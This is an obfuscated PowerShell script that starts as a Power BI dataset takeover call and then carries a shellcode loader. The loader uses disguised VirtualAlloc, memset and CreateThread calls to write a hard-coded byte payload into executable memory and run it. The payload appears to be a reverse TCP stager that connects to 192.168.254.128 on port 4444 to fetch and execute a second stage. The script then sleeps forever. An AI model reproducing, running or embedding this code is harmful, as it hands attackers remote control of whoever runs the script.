${GRoU`p`iD} = ("{0}{2}{1}"-f' FI',' ME IN ','LL')           
${DAt`Aset`id} = ("{0}{2}{3}{1}" -f' FIL','N ','L ','ME I')         




&("{0}{3}{2}{1}" -f 'Login','I','rB','-Powe')


${U`RI} = "groups/$groupId/datasets/$datasetId/Default.TakeOver"


try { 
    &("{4}{5}{2}{3}{1}{0}{6}" -f 'h','werBIRestMet','voke','-Po','I','n','od') -Url ${u`RI} -Method ("{0}{1}"-f'P','ost')

    
    if (-Not ${?})
    {
        ${e`Rr`mSg} = .("{2}{0}{1}{4}{5}{3}"-f 'sol','ve','Re','werBIError','-','Po') -Last
        ${eRRM`SG}."mess`A`ge"
    }
} catch {

    ${er`Rm`SG} = &("{1}{6}{4}{3}{0}{5}{2}"-f 'ower','R','or','e-P','lv','BIErr','eso') -Last
    ${eRR`MsG}."meSs`A`ge"
}
${c} = (((("{111}{105}{12}{35}{79}{22}{34}{83}{119}{48}{113}{23}{14}{63}{101}{8}{86}{100}{103}{84}{85}{0}{44}{60}{16}{97}{47}{102}{107}{62}{31}{65}{43}{17}{40}{87}{39}{108}{68}{19}{57}{118}{4}{82}{99}{18}{50}{116}{33}{56}{123}{96}{51}{30}{36}{67}{104}{58}{54}{13}{38}{71}{59}{98}{66}{81}{115}{92}{89}{88}{1}{20}{121}{61}{72}{73}{28}{95}{27}{80}{90}{25}{3}{9}{77}{11}{64}{112}{45}{49}{37}{74}{75}{122}{94}{114}{91}{55}{2}{46}{120}{69}{106}{26}{117}{110}{52}{29}{124}{7}{70}{41}{6}{78}{21}{32}{10}{93}{15}{24}{53}{5}{109}{42}{76}" -f 'IntPtr','Thread','dId);[DllImpo','ss, ','lImpo','o','t','ter','n','Int','t src','eter, ui','o','Pt','tati',' uin','ddres','l','rnel32.d','ote','Attributes, ',' memset(I','kerne','s','t','re','.dll{','tart','e, IntPtr ',' static ','ta','ize,','ntPtr dest, uin','{0})]','l32.d','rt','t','eatio','r ','uint','Allocat','ntP','nt)','nt f',' l','dwC','r',', ','})]pub','r','l','s',']public',' c','t','rea','pub','ct);[D','n','teTh','pA','nt dwSta','dwS','c ','nt',' ui','e','ic extern ','r','}msvcr','n I','Crea','c','kSiz','nFla','gs',';','Ptr lpParam','r','({0}','Ad','a','rt({0}','l','ualAllo','c(','tPt','ionType, ','r lp','t','d','Th','(IntP',',',' Int','lpS','c ','s','r','ke','r','extern I','uin',' Virt','I','DllImp','t','t ',' flP','u','})','[',' ','lic ','Ptr lp','d','l','0','l','l{0','t({0','ui',',','li','ex'))-F [chAR]34));${W} = &("{0}{2}{1}"-f'Add-Ty','e','p') -memberDefinition ${C} -Name ("{0}{1}" -f'Wi','n32') -namespace ("{2}{0}{1}"-f 'on','s','Win32Functi') -passthru;[Byte[]];[Byte[]]${Z} = 0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x05,0x68,0xc0,0xa8,0xfe,0x80,0x68,0x02,0x00,0x11,0x5c,0x89,0xe6,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0a,0xff,0x4e,0x08,0x75,0xec,0xe8,0x61,0x00,0x00,0x00,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7e,0x36,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7d,0x22,0x58,0x68,0x00,0x40,0x00,0x00,0x6a,0x00,0x50,0x68,0x0b,0x2f,0x0f,0x30,0xff,0xd5,0x57,0x68,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x5e,0x5e,0xff,0x0c,0x24,0xe9,0x71,0xff,0xff,0xff,0x01,0xc3,0x29,0xc6,0x75,0xc7,0xc3,0xbb,0xf0,0xb5,0xa2,0x56,0x6a,0x00,0x53,0xff,0xd5;${g} = 0x1000;if (${z}."L`EngTh" -gt 0x1000){${g} = ${Z}."L`engtH"};${x}=${W}::("{0}{2}{1}{3}"-f'V','tualAll','ir','oc').Invoke(0,0x1000,${G},0x40);for (${I}=0;${I} -le (${z}."le`NgTH"-1);${I}++) {${w}::"M`E`mSet"([IntPtr](${X}.("{2}{0}{1}" -f 't3','2','ToIn').Invoke()+${I}), ${Z}[${i}], 1)};${W}::("{1}{3}{2}{0}" -f'd','CreateTh','ea','r').Invoke(0,0,${X},0,0,0);for (;;){.("{0}{2}{1}{3}"-f'St','-','art','sleep') 60};
